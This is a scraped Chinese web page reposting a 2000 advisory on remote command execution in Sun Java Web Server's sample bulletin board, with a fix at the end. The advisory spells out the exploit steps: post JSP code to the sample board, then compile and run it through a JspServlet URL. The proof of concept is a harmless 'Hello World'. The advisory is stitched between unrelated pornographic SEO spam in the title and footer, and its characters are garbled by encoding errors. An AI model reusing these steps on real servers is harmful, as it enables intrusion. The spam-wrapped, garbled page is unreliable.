六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞

[摘要]Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞 漏洞發(fā)布時間:2000-7-13 17:41:00漏 洞 描 述:在Solaris and Windows NT的Sun Java Web Serv...
Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞



漏洞發(fā)布時間:2000-7-13 17:41:00
漏 洞 描 述:

在Solaris and Windows NT的Sun Java Web Server默認(rèn)安裝設(shè)置下。通過公告版的樣板程序的漏洞,可以遠(yuǎn)程執(zhí)行任意命令。

漏洞測試方法如下:

下面的例子將顯示如何上載和執(zhí)行該代碼,而在服務(wù)器上顯示"Hello World"。

輸入下面的JSP代碼將打印出"Hello World":

<% String s="Hello World"; %>
<%=s %>

通過下面的公告版連接Post這段代碼:

http://jws.site/examples/applications/bboard/bboard_frames.html

檢驗是否該代碼真正的上載了:

http://jws.site/board.html

通過執(zhí)行下面的連接編譯和執(zhí)行該代碼:

http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html

解 決 方 法:

仔細(xì)按照J(rèn)ava Web Server手冊中的"How to secure a web site that uses the Java Web Server" 一章進(jìn)行設(shè)置,或者參考下面連接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者簡單的移除默認(rèn)安裝的這些樣板文件。








主站蜘蛛池模板: 在线视频一区二区日韩国产 | 亚洲欧美日韩国产精品一区 | 午夜黄色毛片 | 欧美专区一区二区三区 | 亚洲aaa| 污污视频在线 | 全免费一级午夜毛片 | 中文字幕色 | 青青青国产手机在线播放 | 五月天婷婷网站 | 在线播放亚洲精品富二代91 | 伊人久久青青 | 青草视频.com | 亚洲第一区在线 | 无遮挡毛片a级武则天 | 一二三中文乱码亚洲乱码 | 日本大蕉香蕉大视频在线观看 | 色综合久久夜色精品国产 | 日韩综合在线视频 | 欧美一级一级做性视频 | 色成人综合 | 日本xxx在线| 欧美中文字幕在线看 | 伊人网站在线观看 | 日韩特级| 日本在线www | 一级做a爱过程免费视频高清 | 青草久久影院 | 亚洲男人天堂影院 | 日韩性黄色一级 | 欧美一级高清在线观看 | 亚洲影院一区 | 日本特黄特色aa大片免费 | 全免费一级午夜毛片 | 一级黄色片免费播放 | 亚洲人成网站看在线播放 | 午夜a今 | 日本国产视频 | 丝袜美女啪啪 | 日韩精品一区二区三区大桥未久 | 欧美视频在线免费看 |